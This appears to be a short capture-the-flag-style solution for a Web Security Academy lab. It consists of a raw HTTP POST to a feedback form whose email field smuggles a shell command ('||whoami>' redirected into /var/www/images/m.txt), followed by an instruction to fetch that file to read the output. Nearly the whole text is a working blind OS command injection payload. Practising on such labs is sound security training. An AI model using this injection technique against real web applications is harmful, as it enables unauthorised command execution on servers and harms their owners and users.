POST /feedback/submit HTTP/2
Host: 0a75004804b2a35b80b1e4f800ab0004.web-security-academy.net
Cookie: session=L3JeRCDFcpB5DQHTRIvjfpR3xEvBsS5U
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: https://0a75004804b2a35b80b1e4f800ab0004.web-security-academy.net
Referer: https://0a75004804b2a35b80b1e4f800ab0004.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

csrf=kImGAlHRGoAkLTb5bTyNQIHqg8soIOOY&name=new&email=sddsa%40fd.net||whoami>/var/www/images/m.txt||&subject=d&message=ASD

Then access the path of /var/www/images/m.txt to see the output of your command

peter-uqYewo